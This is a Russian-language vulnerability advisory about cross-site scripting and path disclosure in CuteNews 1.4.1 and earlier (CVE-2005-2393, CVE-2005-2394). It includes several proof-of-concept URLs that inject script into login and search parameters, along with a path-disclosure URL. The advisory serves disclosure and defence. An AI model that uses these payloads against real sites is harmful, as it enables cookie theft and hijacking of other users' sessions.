Security Lab

Межсайтовый скриптинг в CuteNews

Дата публикации:21.07.2005
Дата изменения:26.01.2009
Всего просмотров:1953
Опасность:
Низкая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2005-2393
CVE-2005-2394
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: CuteNews 1.x
Уязвимые версии: CuteNews 1.4.1 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость обнаружена в сценариях 'login.php' и 'search.php' из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/[path]/index.php?lastusername='>
<script>alert(document.cookie)</script><!--

http://[target]/[path]/index.php? lastusername=
%27%3E%3Cscript%3Ealert%28document.
cookie%29%3C%2Fscript%3E%3C%21--

http://[target]/[path]/search.php?selected_search_arch=>
< script>alert(document.cookie)</ script><!--

http://[target]/[path]/search.php?selected_search_arch=
%3E%3Cscript%3Ealert%28document.cookie%29%3C
%2Fscript%3E%3C%21—

Удаленный пользователь может с помощью специально сформированного URL получить данные об установочной директории. Пример:

http://[target]/[path]/show_news.php?archive=whathell

URL производителя: cutephp.com/cutenews/

Решение: Способов устранения уязвимости не существует в настоящее время.

Журнал изменений:

26.01.2009
Изменена секция «Программа».

Ссылки: CuteNews 1.3.6 path disclosure & cross site scripting